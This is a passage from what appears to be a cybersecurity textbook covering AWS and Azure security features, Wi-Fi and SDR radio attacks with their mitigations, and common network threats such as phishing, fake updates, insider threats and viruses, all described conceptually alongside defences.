leading the charts with about 32.3% of market share according to a report from Canalys.
According to AWS, five foundational pillars together form the AWS Well-Architected
framework. These pillars are important to discuss as they are universal principles that can
and should be included in any operational setup. They are as follows:
[ 45 ]
Security for Cloud and Wireless Networks Chapter 2
AWS has a security-focused approach toward cloud services, encapsulating key attributes.
For each of these attributes, it offers a number of services as seen in the following table:
Next, we will take a deep dive into the various security features offered by AWS Cloud
Security and see how they enhance the security posture for cloud implementation.
[ 46 ]
Security for Cloud and Wireless Networks Chapter 2
Threat defense: Perform big data analysis for intrusion detection and prevention,
DoS protection, encryption, and cyclic penetration testing.
Network isolation: Restricted internet access by default, along with the use of
network security groups, data segregation, and isolated VPNs.
Besides the aforementioned benefits, AWS provides a whole lot of advantages, some of
which we will discuss in detail in the subsequent subsections.
Define a management policy for rolling out to users and groups (where a group is
a logical grouping of users with the application of a group policy).
Services (least privilege and granular controls) and roles (used for instances and
functions).
Implementation of least privilege as a principle.
MFA on important accounts and services.
Usage of temporary credentials (when applicable) via AWS STS.
Utilize Access Advisor.
Usage of credentials management tools such as AWS Systems Manager, Secrets
Manager, Amazon Cognito (for mobile and web applications), and AWS Trusted
Advisor.
Traceability
This demonstrates the capability to track activity in the environment. This can be achieved
by capturing data logs and applying analytics to them. This is done with the help of the
following:
[ 47 ]
Security for Cloud and Wireless Networks Chapter 2
Defense in depth
This is a crucial security concept that should be adopted across the board with verifiable
efficiency. In the context of AWS, this involves the following:
[ 48 ]
Security for Cloud and Wireless Networks Chapter 2
Most organizations have classifications such as Public, Private, and Restricted. However,
based on the sensitivity and the operational model, further classifications can be
considered. This can subsequently be clubbed with the IAM policy for a streamlined
approach.
AWS provides a service called Amazon Macie, which offers an automated approach
to discover, classify, and protect sensitive data through machine learning. For data in
transit, security features such as VPN connectivity to the VPC, TLS application
communication, ELB, or CloudFront with ACM should be considered. Likewise, encryption
and tokenization should be considered for data at rest. Beyond this, we can leverage
Amazon Certificate Manager, AWS KMS, AWS CloudHSM, and so on.
Similar to AWS, there are many top dogs in the cloud service provider domain that have
customization comparable with AWS in terms of the broader security framework. A top
competitor to AWS is Microsoft's Azure. Let's see what it has to offer in the next section.
[ 49 ]
Security for Cloud and Wireless Networks Chapter 2
[ 50 ]
Security for Cloud and Wireless Networks Chapter 2
Next, we will learn how to incorporate security into your architecture design, and discover
the tools that Azure provides to help you create a secure environment through all the layers
of your architecture.
With the change in the dynamics of work brought about by the constant digital
transformation and unforeseen events such as the COVID-19 pandemic, organizations are
now allowing users to bring your own device (BYOD), which means that most of the
components of the network are now no longer under the control of the organization. The
Zero Trust model relies on the verifiable user and device trust claims to grant access to
organizational resources. No longer is trust assumed based on the location inside an
organization's perimeter.
This model has forced security researchers, engineers, and architects to rethink the
approach applied to security. Hence, now we utilize a layered strategy to protect our
resources, called defense in depth.
Security layers
Defense in depth can be visualized as a set of concentric rings with the data to be secured at
the center. Each ring adds an additional layer of security around the data. This approach
removes reliance on any single layer of protection and acts to slow down an attack and
provide alert telemetry that can be acted upon, either automatically or manually. Each layer
can implement one or more of the CIA concerns:
[ 51 ]
Security for Cloud and Wireless Networks Chapter 2
With every additional layer, the security of your network is improved, so that it becomes
difficult for threat actors to reach the innermost layer where your precious and confidential
data is stored.
Today, organizations are looking at ways they can bring the following capabilities into their
applications:
Azure Application Proxy can be used to quickly, easily, and securely allow the application
to be accessed remotely without any code changes. Azure AD Application Proxy is
composed of two components: a connector agent that sits on a Windows server within your
corporate network, and an external endpoint, either the MyApps portal or an external URL.
When a user navigates to the endpoint, they authenticate with Azure AD and are routed to
the on-premises application via the connector agent.
[ 52 ]
Security for Cloud and Wireless Networks Chapter 2
Criticality of infrastructure
Cloud infrastructure is becoming a critical piece of many businesses. It is critical to ensure
that people and processes have only the rights they need to get their job done. Assigning
incorrect access can result in data loss and data leakage, or cause services to become
unavailable.
System administrators can be responsible for a large number of users, systems, and
permission sets. Correctly granting access can quickly become unmanageable and can lead
to a "one size fits all" approach. This approach can reduce the complexity of administration,
but makes it far easier to inadvertently grant more permissive access than required.
RBAC offers a slightly different approach. Roles are defined as collections of access
permissions. On Azure, users, groups, and roles are all stored in the Azure AD. The Azure
Resource Manager API uses RBAC to secure all resource access management within Azure
and can be clubbed with the Azure AD Privileged Identity Management (PIM) for
auditing member roles.
To use PIM, you need one of the following paid or trial licenses:
Azure AD Premium P2
Enterprise Mobility + Security (EMS) E5
It's often valuable for services to have identities. Often, and against best practices, the
credential information is embedded in configuration files. With no security around these
configuration files, anyone with access to the systems or repositories can access these
credentials, which exposes the organization to risk.
[ 53 ]
Security for Cloud and Wireless Networks Chapter 2
Encryption
Data is an organization’s most valuable and irreplaceable asset, and encryption serves as
the last and strongest line of defense in a layered security strategy. Here, we'll take a look at
what encryption is, how to approach the encryption of data, and what encryption
capabilities are available on Azure. This includes both data at rest and data in transit.
By taking an inventory of the types of data being stored, we can get a better picture of
where sensitive data may be stored and where existing encryption policies may or may not
be employed.
[ 54 ]
Security for Cloud and Wireless Networks Chapter 2
Encryption on Azure
Azure Storage Service Encryption (SSE) can be used to protect data to meet the essential
information security and compliance requirements. SSE automatically encrypts all data
with 256-bit AES encryption where the encryption, decryption, and key management are
optimized by default.
This encompasses encrypting VMs with Azure Disk Encryption (ADE), encrypting
databases with Transparent Data Encryption (TDE), encrypting secrets with Azure Key
Vault's cloud service, and encrypting backups with Azure Backup for on-premises
machines and Azure VMs.
Network security
Network security involves protecting the communication of resources within and outside
of your network. The goal is to limit exposure at the network layer across your services and
systems. By limiting this exposure, you decrease the likelihood that your resources can be
attacked. In the realm of network security, efforts can be focused on the following areas:
Securing traffic flow between applications and the internet: This focuses on
limiting exposure outside your network. Network attacks will most frequently
start outside your network, so by limiting your network's exposure to the
internet and securing the perimeter, the risk of being attacked can be reduced.
Securing traffic flow among applications: This focuses on data between
applications and their tiers, between different environments, and in other
services within your network. By limiting exposure between these resources, you
reduce the effect a compromised resource can have. This can help reduce further
propagation within a network.
Securing traffic flow between users and the application: Securing traffic flow
between users and the application focuses on securing the network flow for your
end users. This limits the exposure your resources have to outside attacks and
provides a secure mechanism for users to utilize your resources.
A common thread throughout this chapter has been taking a layered approach to security,
and this approach is no different at the network layer. It's not enough to just focus on
securing the network perimeter or focusing on the network security between services inside
a network. A layered approach provides multiple levels of protection so that if an attacker
gets through one layer, there are further protections in place to limit further attacks.
Let's take a look at how Azure can provide the tools for a layered approach to securing
your network footprint.
[ 55 ]
Security for Cloud and Wireless Networks Chapter 2
Internet protection
If we start on the perimeter of the network, we're focused on limiting and eliminating
attacks from the internet. A great first place to start is to assess the resources that are
internet-facing, and only allow inbound and outbound communication where necessary.
Identify all resources that allow inbound network traffic of any type, and ensure they are
necessary and restricted to only the ports/protocols required. Azure Security Center is a
great place to look for this information, as it will identify internet-facing resources that
don't have network security groups associated with them, as well as resources that are not
secured behind a firewall.
Using a web application firewall (WAF) to provide advanced security for your
HTTP-based services. The WAF is based on rules from the OWASP 3.0 or 2.2.9
core ruleset, and provides protection from commonly known vulnerabilities such
as cross-site scripting and SQL injection.
For the protection of non-HTTP-based services or for increased customization,
network virtual appliances (NVAs) can be used to secure your network
resources. NVAs are similar to firewall appliances you might find in on-premises
networks and are available from many of the most popular network security
vendors. NVAs can provide greater customization of security for those
applications that require it, but can come with increased complexity, so careful
consideration of requirements is advised.
To mitigate these attacks, Azure DDoS provides basic protection across all Azure services
and enhanced protection for further customization of your resources.
Virtual networks
Network security groups are entirely customizable and provide the ability to fully lock
down network communication to and from your VMs. By using network security groups,
you can isolate applications between environments, tiers, and services.
To isolate Azure services to only allow communication from virtual networks, use virtual
network service endpoints. This reduces the attack surface for your environment, reduces
the administration required to limit communication between your virtual network and
Azure services, and provides optimal routing for this communication.
[ 56 ]
Security for Cloud and Wireless Networks Chapter 2
Network integrations
Network infrastructure often requires integration to provide communication over Azure.
We can utilize a VPN to initiate secure communication channels.
In order to provide committed and private connections, we can use tools such as
ExpressRoute. This results in the improvement of secure communication over a private
circuit rather than the public internet.
To easily integrate multiple virtual networks in Azure, virtual network peering establishes
a direct connection between designated virtual networks. Once established, you can use
network security groups to provide isolation between resources in the same way you
secure resources within a virtual network. This integration gives you the ability to provide
the same fundamental layer of security across any peered virtual networks.
Communication is only allowed between directly connected virtual networks.
With this, we come to an end of our discussion on Microsoft Azure. For a detailed deep
dive into the features of Azure and its implementation, please view the Microsoft Azure
documentation at https://docs.microsoft.com/en-us/azure/security/azure-security,
which is a great learning resource. I recently also came across an article that talks about
addressing cloud security with the help of Azure Sentinel and existing Security
information and event management (SIEM). It can be found at https://www.peerlyst.
com/posts/uplift-the-capability-of-your-existing-enterprise-siem-with-azure-
sentinel-to-address-cloud-security-arun-mohan. While you are at it, do check out the
Azure Sentinel design as well.
So far in this chapter, we have covered two of the most popular cloud providers –
Amazon's AWS and Microsoft's Azure. Moving on next, we will take a look at CipherCloud
and some of its key features.
CipherCloud
Established in 2010, CipherCloud operates across PaaS, SaaS, and IaaS. It provides cloud
security solutions for a vast range of providers and is compliant with a mix of global
privacy and compliance regulations including GDPR and PCI. We will not discuss
CipherCloud to the core, however, we will look at some of its important platforms and
features that make it a notable mention:
[ 57 ]
Security for Cloud and Wireless Networks Chapter 2
[ 58 ]
Security for Cloud and Wireless Networks Chapter 2
[ 59 ]
Security for Cloud and Wireless Networks Chapter 2
This concludes our section on CipherCloud, which is one of the most competitive next-gen
CASB solutions available on the market. You can also explore various different vendors in
the space at https://www.csoonline.com/article/3104981/what-is-a-cloud-access-
security-broker-and-why-do-i-need-one.html and https://www.gartner.com/reviews/
market/cloud-access-security-brokers.
Similarly, we have other vendors with a suite of security functions as part of their overall
cloud security offering. Some of the prominent ones are Palo Alto Networks, Cisco, Sophos,
Proofpoint, Skyhigh Networks, and ZScaler. Apart from these, we can also look at
dedicated vendors for specific security solutions such as Centrify Cloud for PAM,
Boxcryptor for end-to-end encryption, and so on.
In this section, we will go over some of the security threats as countermeasures that
organizations face after moving to the cloud.
[ 60 ]
Security for Cloud and Wireless Networks Chapter 2
Security threats
Cloud computing is a very dynamic environment in terms of growth and service offerings
and has several security threats and risks associated with its application, which it is
necessary to account for in the planning and implementation stage itself. Some of the major
factors are as follows:
These points provide an outline of the commonly faced threats related to cloud
implementation; however, based on the deployment, there may be different issues that
might surface. Hence, it is important to demonstrate due diligence and due care through
the entire life cycle and conduct cyclic reviews and audits.
Countermeasures
Since we talked about the risk factors, let's also take a look at the mitigating steps that
should be taken by organizations to accurately assess and manage the security of their
cloud environment to mitigate risks:
[ 61 ]
Security for Cloud and Wireless Networks Chapter 2
In this section, we took a deep look at the different aspects of cloud computing, AWS, and
how to protect your cloud with the use of various techniques. Irrespective of how secure an
organization's cloud environment is, it's imperative that the internal network environment
is secured as well. This is why, in the next section, we will be taking a look at the
different aspects of wireless security.
In this section, we will take a look at a few attack surface analysis and exploitation
techniques, along with a few best practices while using Wi-Fi.
Check out the following wireless security wiki if you already have a good
grip on the basics of wireless security. The wiki caters to the red/blue team
perspective and is available at https://www.peerlyst.com/posts/a-
wireless-security-wiki-peerlyst.
[ 62 ]
Security for Cloud and Wireless Networks Chapter 2
The Wi-Fi logs can be used for performance analysis as well as security purposes. For
example, if you are a big retail store, then your Wi-Fi data can be used to do the following:
On the other hand, for security purposes in an organization, this data can be used to create
user behavior profiles (this is considered unethical and non-compliant in some countries)
that do the following:
There are many tools out there that offer these features and functionality, one of which
is Acrylic Wi-Fi Professional. It has the following features:
[ 63 ]
Security for Cloud and Wireless Networks Chapter 2
Make sure the Wi-Fi infrastructure is safe and secure. Provide admin access only to those
who need it, and implement security measures on your Wi-Fi infrastructure, physical and
logical.
A few of the common modes of attack and exploitation that impact Wi-Fi networks are
shown in the following table, along with the tools that can be used to mitigate them:
[ 64 ]
Security for Cloud and Wireless Networks Chapter 2
For additional insights into wireless attacks and safeguards, please refer to
Wireless Exploitation and Mitigation Techniques, by Gianfranco Di Santo:
http://csc.csudh.edu/cae/wp-content/uploads/sites/2/2013/11/
Research-Paper.pdf
In this section, we learned about the various attack and exploitation techniques that can be
used to test and verify the security controls. In the next section, we will take a look at some
of the best practices that will help you take your security posture to the next level.
Best practices
With the dynamic requirement for internet access anywhere, Wi-Fi has now become an
integral part of life. The ease of connectivity and availability anywhere makes it very
attractive to users. But everything has its pros and cons.
While Wi-Fi offers ease of connectivity, it also brings in security issues and the possibility of
hacking and eavesdropping if not configured and used appropriately. The open Wi-Fi
networks in public areas are the most vulnerable ones. Therefore, it is always advisable to
use Wi-Fi networks with the utmost precaution. Wi-Fi networks can be at
enterprise/personal or public level and can be secured or unsecured.
[ 65 ]
Security for Cloud and Wireless Networks Chapter 2
Here are some of the do's or best practices while using a Wi-Fi network:
A few of the products used for Wi-Fi security are Cisco Wireless Security Suite,
WatchGuard Wi-Fi Security, Sonicwall Distributed Wi-Fi Solution, and CheckPoint UTM-1
Edge W.
The following is a list of some of the key security solutions and their desired capabilities:
[ 66 ]
Security for Cloud and Wireless Networks Chapter 2
Shadow IT discovery:
CSA methodology-based risk knowledge base.
Identify potentially risky cloud applications.
Identify and discover all cloud apps in use.
Encryption and tokenization:
Persistent end-to-end cloud data encryption
Control over the encryption process and keys used
The ability to encrypt and decrypt any type of data across mobile
and endpoints
The availability of AES 256-bit encryption with FIPS 140-2
validation
Minimal latency and highly scalable solutions
Encryption at rest, in transit, and in use
SaaS and IaaS apps should enable file- and field-level encryption
Integration with digital rights management solutions
A secure JDBC-compliant database for storage of data.
Digital rights management:
Secure access to sensitive files on mobile devices
Security checks to validate whether actions are performed by
authorized and authenticated users
Readily available integrations for third-party file-sharing apps
Real-time, remote wipe functionality for compromised devices
Adaptive access control:
IAM and MDM integration to carry over the organization's access
policies to cloud apps
Concurrent login protection
Device access protection
Context-aware policies
On-demand scanning of existing cloud data
Dynamic remediation
Cloud security posture management:
Monitor the cloud environment for new services and
misconfigurations.
Enforcement of security policies, compliance and regulatory
requirements, and industry standards.
[ 67 ]
Security for Cloud and Wireless Networks Chapter 2
If interested, you can also check out Xiaopan OS, which is a penetration-
testing distribution for wireless security enthusiasts and can be found
at https://sourceforge.net/projects/xiaopanos/.
In this section, we have taken a look at the best practices that will enable you to quickly
ensure that you have a robust and secure deployment. Next, we will take a look at the
approach needed for a security assessment.
[ 68 ]
Security for Cloud and Wireless Networks Chapter 2
Based on the risk assessment, we will be able to provide recommendations and an action
plan that clearly outlines the actionable steps that need to be carried out in order to fix the
security gaps and bring the organization up to the desired level of maturity and also meet
the regulatory requirements needed to protect the organization. The key steps will be as
follows:
1. Cyber risk assessment: This is a detailed risk assessment explaining the step-by-
step approach, tools, and results. Confirm and document the approach, scope,
and goals of the engagement. Create a detailed plan of what needs to be done,
who needs to be interviewed, what documents need to be reviewed, and what
follow-ups are needed after the first engagement to verify and observe the
findings.
2. Risk assessment: Determine and assess the risks and threats faced by the
organization. This may include conducting personal interviews with the process
owners and subject matter experts of the process in order to understand the
process better. This will also require the study of the documented process and
any past audit reports, among other documentation that shows how the process
is supposed to be followed and how it is done on the ground. Also, take into
account what is mandated by the regulators and how the teams adhere to them.
3. Cybersecurity maturity assessment: Conduct a gap assessment and use the NIST
CSF scoring guidelines to calculate the organization's level of cybersecurity
maturity. This may require more insight based on the various other cybersecurity
frameworks that are available in the market. It's always better to have reference
to more than one framework, as it shows the importance and relevance of the
findings and how they correlate to various regulatory and compliance
requirements. The basic idea is to identify the risk and gaps, and map these to all
the possible recommendations from different frameworks that relate to it.
4. Recommendations: Leverage the results from the risk assessment and the
maturity scoring to develop recommendations. This should talk about the
security issues that are being solved and how they are being remediated. This
should also provide information about any residual risk and cost/benefit
analysis. If there is more than one solution, then do mention the others, but make
sure to prioritize them and call out each one's pros and cons.
5. Documentation: Prioritize risk assessment results and recommendations into an
action plan with a time frame that would comply with the required mandates.
This may include senior leadership visibility, so make sure to prepare an
executive summary and a report that speaks broadly to the major issues. For the
technical team, there can be separate documentation with the tactical and
technical walkthroughs and your detailed findings.
[ 69 ]
Security for Cloud and Wireless Networks Chapter 2
The overall aim is to conduct a risk assessment and evaluate the organization's
cybersecurity program and develop recommendations along with a high-level action plan
to address the cybersecurity requirements. Failure to meet the cybersecurity requirements
will lead to increased compliance, operational, and reputational risks. The NIST
Cybersecurity Framework, along with any other industry-recognized frameworks, can be
used as a guiding line along with the regulatory requirements, if any. The key actions
should include (but not be limited to) the following:
[ 70 ]
Security for Cloud and Wireless Networks Chapter 2
Replay attacks
The most common type of attack is based on capturing a command sequence and re-
transmitting it later. This is fairly easy to do using an SDR. Here's how it's done:
Remember that for executing the actual exploit, the attacker is required to transmit the
isolated command sequence on the same frequency in the vicinity of the IoT device, which
in turn replays the command on that device. URH and a few other pieces of software for
SDR can replay captured signals without much manual intervention.
Cryptanalysis attacks
This type of attack is much more sophisticated and can be used to exploit the devices. This
is how it is done:
1. The first step in this attack is the same as for the previous attack – capturing a
sample command signal.
2. Once that signal is obtained, it is analyzed in URH. The noise threshold of the
environment is subtracted from the signal to obtain the original signal.
3. After that, the signal is demodulated, but that requires the knowledge of
the modulation scheme used in the communication system.
4. Now the protocol is reverse-engineered and the actual command sequence is
obtained. This can then be used to craft the messages directly and send them over
to other devices of the same type.
Replay attacks do not always work across multiple devices because the communication
protocol often uses device identification numbers. Cryptanalysis attacks require in-depth
knowledge of both cryptography and communication theory, which are not required in
replay attacks.
[ 71 ]
Security for Cloud and Wireless Networks Chapter 2
Wearable devices have been gaining prominence both for individuals who use them to
monitor their health and for insurance companies that use it to gauge what incentives they
should provide. Wearable devices often use Bluetooth for near-field communication. Until
now, these devices have been highly vulnerable (devices that use versions older
than Bluetooth 4.2 still are) to both replay and cryptanalysis attacks. If a rogue SDR is
installed in a public setting such as a gym, these devices can be manipulated to show false
health reports and harm both the users and the businesses depending on it.
Reconnaissance attacks
This type of attack is complementary to the cryptanalysis attack. It is not feasible to guess
the type of modulation scheme used or the protocol used in the captured communication
sample. This information can often be obtained from the device spec sheet.
All devices that make use of RF bandwidth are required to be certified by the authorities in
that country (such as the FCC for the USA), and they publish analysis reports about all such
devices publicly. Manufacturers often try to thwart attackers attempting this type of
analysis by removing any identification markings from the chips. The attackers then
analyze the chips using a multimeter and mark out various pins, which are then compared
to the public schematics of other similar chips to determine the product ID.
Mitigation techniques
We just saw some common radio attacks. But is there any way we can mitigate them? Yes!
In order to mitigate SDR attacks, a few modern IoT devices have come to the rescue. Some
of the techniques used are described as follows:
Encrypting the signals: This is the most important precaution. All systems
should be engineered with the assumption that they will operate in a hostile
environment. While the modulation scheme can be figured out by recon attacks,
reverse engineering the protocol is a much more difficult problem.
Using rolling commands: Using the same command every time exposes the
device to replay attacks. Modern IoT devices use commands that work on a
rolling window basis, so a command used once is not used again. Each command
is specific to a particular device too. Vulnerable implementations of this scheme
use a small keyspace that can be brute-forced by an attacker with some patience.
[ 72 ]
Security for Cloud and Wireless Networks Chapter 2
IoT security is a game of cat and mouse. Both sides in the war are always finding ways to
outsmart the other. Now that vehicles and industrial machines are also being equipped
with IoT, the security aspect has never been more important. Attackers have
already demonstrated hacking multiple IoT devices using affordable SDRs. Awareness
among manufacturers is increasing but a lot more work still needs to be done in this area.
Summary
In this chapter, we took a look at concepts surrounding cloud computing, wireless security,
and SDR attacks. We briefly touched upon the Cloud shared responsibility model, which
demonstrates who is responsible for what in a cloud service engagement. Next, we took a
look at the various security attributes and components with regard to AWS and its close
competitor – Microsoft Azure. We also touched on other cloud security solutions such as
CipherCloud, and other security functions. Next, we discussed the need for securing the
wireless network, the tools and techniques that are used by threat actors, and how to
defend against them. Toward the end of the chapter, we also discussed radio attacks and
their corresponding mitigations.
This chapter enabled you to understand the key aspects and attributes required to securely
implement and operationalize a cloud deployment.
In the next chapter, we will discuss the top network threats that organizations face and how
you, as a security professional, can mitigate them using a variety of techniques. We will
also discuss how your organization can keep up with the evolving threat landscape and
mitigate against new vulnerabilities and establish a continuous monitoring process.
[ 73 ]
Security for Cloud and Wireless Networks Chapter 2
Questions
As we conclude, here is a list of questions for you to test your knowledge regarding this
chapter's material. You will find the answers in the Assessments section of the Appendix:
[ 74 ]
Security for Cloud and Wireless Networks Chapter 2
6. For the _________ model, the security boundary may be defined by the vendor to
include the software framework and middleware layer.
SaaS
PaaS
IaaS
All of the above
7. Which of the following types of cloud does not require mapping?
Public
Private
Hybrid
Community cloud
8. Which of the following offers the strongest wireless security?
WEP
WPA
WPA2
WPA3
9. _______________ is the central node of 802.11 wireless operations.
WPA
An access point
WAP
An access port
10. ___________ is the process of wireless traffic analysis that may be helpful for
forensic investigations or when troubleshooting any wireless issue.
Wireless traffic sniffing
Wi-Fi traffic sniffing
Wireless traffic checking
Wireless transmission sniffing
[ 75 ]
Security for Cloud and Wireless Networks Chapter 2
Further reading
AWS Security Fundamentals: https://www.slideshare.net/
AmazonWebServices/aws-security-fundamentals-79024249
The 5 Pillars of the AWS Well-Architected Framework: https://aws.amazon.
com/blogs/apn/the-5-pillars-of-the-aws-well-architected-framework/
Building an Incident Response Plan for the Cloud: https://aws.amazon.com/
blogs/publicsector/building-a-cloud-specific-incident-response-plan/
Microsoft Azure Overview: https://www.slideshare.net/AlertLogic/
microsoft-azure-security-overview
Azure Security Introduction: https://docs.microsoft.com/en-us/azure/
security/azure-security
Microsoft Azure Well-Architected Framework: https://docs.microsoft.com/
en-us/azure/architecture/framework/
Security for Cloud Computing: Ten Steps to Ensure Success: https://www.omg.
org/cloud/deliverables/CSCC-Security-for-Cloud-Computing-10-Steps-to-
Ensure-Success.pdf
A security analysis of Zigbee: https://courses.csail.mit.edu/6.857/2017/
project/17.pdf
Wireless exploitation and mitigation techniques: http://csc.csudh.edu/cae/wp-
content/uploads/sites/2/2013/11/Research-Paper.pdf
For wireless penetration testing: https://www.packtpub.com/in/networking-
and-servers/kali-linux-wireless-penetration-testing-cookbook
and https://www.packtpub.com/in/networking-and-servers/advanced-
wireless-penetration-testing-highly-secured-environments
[ 76 ]
3
Mitigating the Top Network
Threats of 2020
Today, due to the multi-dimensional and complex setup of networks, security threats are
creeping up that result in cyber disruptions and cyber attacks. These threats are commonly
seen in networks that don't keep up with the evolving threat landscape due to foundational
security and newly identified vulnerabilities that are not managed appropriately. Threats
come in multiple types and variations that can employ components such as links, malicious
attachments, and application or network misconfigurations to penetrate the infrastructure.
This can comprise anything from trojans, viruses, backdoors to insider threats, botnets to
DDOS attacks, and many more. Hence, it is important to understand the prevalent network
threats that organizations face and how to counter them.
Accordingly, in this chapter, we will take a look at the most commonly faced network
threats and how to mitigate them effectively. You will learn some of the most important
methods and tools that can be used to secure your network from these threats.
Technical requirements
Before we begin, familiarize yourself with the following services to get the most out of this
chapter:
[ 78 ]
Mitigating the Top Network Threats of 2020 Chapter 3
But what are these attacks in the first place? In this first section of this chapter, we will look
at the top 10 network attack vectors and how to mitigate them. We will deep dive into each
of the attack vectors and understand the threat that they pose and their respective
mitigations.
Such threats may go unnoticed or take time before detection until the attacker moves to the
later stages of the cyber kill chain such as exploitation, installation, command and control,
and actions on objectives, which may raise flags in the environment's security mitigation.
This is because if a user is unable to identify a phishing email or the malicious link or the
downloaded payload is not detected in the early stages, then the attacker can lay dormant
in the environment and wait for a favorable opportunity to execute the attack without being
detected. To make things worse, attackers are now actively using a technique known
as Living off the Land (LotL).
[ 79 ]
Mitigating the Top Network Threats of 2020 Chapter 3
This is a technique where attackers make use of trusted off-the-shelf and/or pre-installed
system tools and applications to carry out malicious operations without raising any red
flags. Authorized tools in the environment are often used for malicious activity and
exploitation by threat actors. These include the following:
PowerShell scripts
VB scripts
WMI
Mimikatz
PsExec
The following diagram shows a phishing campaign from the starting phase to the final
stage, where the phishing email (spoofed) is made to look like it comes from a financial
organisation. Once received, it requests the user credentials, which are then used by the
attacker to cash out the account:
In real-world scenarios and threat campaigns, phishing comes in different types and forms
as deployment by the cybercriminal depends on the target profile. Some of the prominent
ones are discussed next:
Email phishing: These are generally scam emails with malicious links and
attachments forged by cybercriminals and made to appear as if they come from a
reputable source. They are also made to impersonate trusted contacts, where
once the links are engaged, malicious malware is downloaded automatically or
the user is redirected to a phishing website to harvest credentials. The following
screenshot shows an example of what a phishing email looks like:
[ 80 ]
Mitigating the Top Network Threats of 2020 Chapter 3
[ 81 ]
Mitigating the Top Network Threats of 2020 Chapter 3
Using all of these techniques, attackers can harvest credentials of employees in the
organization, harvest credentials of vendor accounts, initiate a foothold and perform lateral
movement using malware that is dropped, initiate data exfiltration via mailbox rules (auto-
forwarding), and other techniques.
[ 82 ]
Mitigating the Top Network Threats of 2020 Chapter 3
It may have spelling errors, a generic salutation, or a sender asking for private
information.
It may have attachments or links that don't look right.
We can also deploy mechanisms such as spam filters, and monitor and block illicit
downloads and program executions at endpoints. Employees and individuals are also
supposed to be educated extensively on how to detect phishing activity through live
exercises; they should also be made aware of security best practices such as not using
corporate accounts and passwords in third-party websites and services. Data should be
classified in the organization, and highly sensitive information should be encrypted and not
shared with any non-corporate entity unless specific approvals are in place. Today,
Microsoft Outlook comes with plugins and advanced options to make email
communication secure. Features such as advanced attachment scanning and link checking
ensure blocking of spam and content with lineage to malware such as external links with
advanced detection techniques. Apart from this, it employs techniques such as email
encryption, prevents forwarding, and has password-protected sharing links to ensure the
secure exchange of information.
Organizations also deploy SIEM use cases for effective mitigation against phishing attacks,
leveraging message trace/tracking logs, email gateway logs, and exchange audit logs. They
can also utilize Azure AD or VPN logs and proxy or next-generation firewall logs.
Proactively, every organization should employ strict security policies so that they can deal
with violations appropriately. Every employee should be made to understand these
policies, adhere to them, and commit to the organizational security program.
Password change policy should be enforced with periodic access reconciliation to prevent
authorization creep, thereby maintaining concepts such as least privilege and separation of
duties.
[ 83 ]
Mitigating the Top Network Threats of 2020 Chapter 3
With the fear that a virus has been installed on the computer, scammers easily convince the
user to take their offer of updating and installing security settings on the computer. This
offer, which is mostly free, convinces the user easily and they are compelled to download
the programs offered for the sake of security. They can also send programs to remove the
alleged viruses. Nowadays, using this trick, they can easily ask a user to pay for a tool as
well that will curb the viruses and fix the security update. This scam is a dangerous
network threat that leads to fraud. When the user pays for the alleged tools, they are getting
robbed without their knowledge.
In any case, the user accepts to download the programs provided, which inherently has
malware, trojans, and backdoors embedded in the application, which is installed in the
system automatically and opens the door to system compromise ranging from loss of
confidentiality to integrity to availability. The installed malware gives hackers full access to
confidential information and sensitive data. In this way, passwords, personal credentials,
and other confidential information are hacked without the knowledge of the user.
Important information could also be deleted from the computer system or the whole
program could be broken down. Rogue applications, browser plugins, and advertisements
are therefore a dangerous network threat that should be curbed with absoluteness.
[ 84 ]
Mitigating the Top Network Threats of 2020 Chapter 3
To avoid such potential of fake updates, it is advised to configure the firewall and proxy to
block traffic from low or bad reputation sites. A proficient EDR solution or antivirus
application should also be in place at every endpoint with rules configured to block the
installation of any unauthorized application on the system. Additionally, keep these
mitigations fine-tuned and updated with the latest patches to provide better coverage
against new threat vectors. Education is also critical in this aspect and you can be coached
not to click on suspicious links.
[ 85 ]
Mitigating the Top Network Threats of 2020 Chapter 3
"Since detecting insider threats by employees and trusted third parties is the ultimate
game of cat and mouse, many leading-edge security organizations are using machine
learning to compare the behavior of all users against established baselines of "normal"
activity. This allows them to identify anomalous events and spot outliers so they can
remediate threats early on."
According to IBM's research in the 2016 Cyber Security Intelligence Index, there are two
major types of insider threats—malicious and inadvertent. The following table summarizes
the two insider threats (malicious and inadvertent) and compares them with external threat
actors:
In most cases, after gaining access to sensitive data or resources, malicious activity
protocols follow, intending to harm the organization. The insiders could be a disgruntled
employee performing such actions out of vengeance or in an attempt to exploit their
position for personal gains or they could also have been hired by a competitor of the
organization to initiate cyber espionage. They abuse the trust and access bestowed upon
them by the organization to execute acts such as stealing or selling confidential data or
exploiting by tampering or deleting classified data that is crucial to the organization.
[ 86 ]
Mitigating the Top Network Threats of 2020 Chapter 3
In severe cases, there have been reports of business operation disruptions due to such
insider threat activity. It is, therefore, a very significant threat to the organization that can
be monitored, detected, prevented, and mitigated at the network level by leveraging
security principals and best practices.
[ 87 ]
Mitigating the Top Network Threats of 2020 Chapter 3
Former employees should not hold such information and should be made to sign policy
agreements when leaving to prevent them from leaking confidentiality and damaging the
integrity of the business operations. Company resources such as laptops and handheld
devices should be taken into custody. Access to company resources and accounts should be
frozen. All credentials and access should be changed or terminated when leaving the
organization. In general, the number of employees holding company information is
proportional to the amount of risk and threat they get exposed to.
Different types of insider controls from a technology perspective include the following:
Apart from this, a few other methods that can be employed include the following:
That's all about insider threats. Now, let's move on to our next attack vector—viruses and
worms.
[ 88 ]
Mitigating the Top Network Threats of 2020 Chapter 3
Hence, as evident, if the network is not adequately protected, a virus or a worm can exploit
vulnerabilities in the environment and spread quickly from system to system. When
networks and systems of an organization are infected with such worms, the danger of
collapse is almost certain. They may corrupt the business operation or lead to loss of
integrity for the organization.
The following diagram shows how both worms and viruses work differently when they
attack a network:
[ 89 ]
Mitigating the Top Network Threats of 2020 Chapter 3
There are a variety of different types of computer viruses and worms that are widely used
by threat actors to target organizations, some of which are discussed here:
Resident virus: Resident viruses, for example, Meve, Randex, and CMJ, are
found in RAM. They mainly corrupt programs and files and interfere with the
normal system operations of a computer.
Stealth: Viruses may appear like real programs by accepting operating system
requests but they are not genuine. It is not easily detected by an antivirus. A
sparse infector virus is another one that strategically avoids detection. They infect
occasionally and may only affect a program on its ninth or tenth execution stage,
hence minimizing the rate at which it can be detected.
Internet worms: This malicious software simply appears like an autonomous
program. A device that is infected is used to surf the internet looking for other
vulnerable devices. The process of exploitation begins as soon as a vulnerable
machine on the internet is detected. The most vulnerable and highly exploited
systems are those without recent updates for security patches.
Spacefiller virus: The spacefiller virus is also referred to as the "cavity" virus and
it mainly affects the space between code blocks to execute malicious commands
without theoretically changing the behavior of the affected program. These
